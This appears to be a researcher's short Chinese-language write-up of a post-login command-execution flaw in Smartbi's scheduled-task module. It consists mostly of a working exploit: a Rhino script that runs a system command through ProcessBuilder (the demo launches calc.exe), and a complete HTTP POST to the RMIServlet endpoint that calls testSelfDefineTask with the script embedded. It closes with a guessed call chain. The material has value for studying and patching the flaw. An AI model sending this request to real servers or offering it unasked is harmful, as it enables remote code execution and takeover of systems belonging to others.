Smartbi 后台命令执行漏洞

45011

命令执行

利用后台计划任务模块进行命令执行操作

importPackage(Packages.java.lang);

importPackage(Packages.java.io);

importPackage(Packages.smartbi.repository);

importPackage(Packages.smartbi.util);

importPackage(Packages.java.util);

builder = new ProcessBuilder();

builder.command("cmd", "/c", "calc.exe");

process = builder.start();

点击测试运行，在服务器上成功执行命令

登录之后直接构造一个这样的数据包也是ok 的

POST /smartbi/vision/RMIServlet HTTP/1.1
Host: 192.168.222.133:18080
Content-Length: 446
Cache-Control: max-age=0
If-Modified-Since: 0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
Origin: http://192.168.222.133:18080
Referer: http://192.168.222.133:18080/smartbi/vision/index.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: FQPassword=; JSESSIONID=5B6782359692116A369A4E2F120A4F1C
Connection: close

className=ScheduleSDK&methodName=testSelfDefineTask&params=["test","test","","importPackage(Packages.java.lang);\n\nimportPackage(Packages.java.io);\n\nimportPackage(Packages.smartbi.repository);\n\nimportPackage(Packages.smartbi.util);\n\nimportPackage(Packages.java.util);\n\nbuilder = new ProcessBuilder();\n\nbuilder.command(\"cmd\", \"/c\", \"calc.exe\");\n\nprocess = builder.start();","admin","I40285e0501893dce3dcec72501893dd318210023"]

抓取数据包分析代码

我推测是这样的

smartbi.scheduletask.runneragent.ScheduleSDK#testSelfDefineTask

smartbi.scheduletask.task.TaskBO#executeV2

org.mozilla.javascript.Context#evaluateString

‍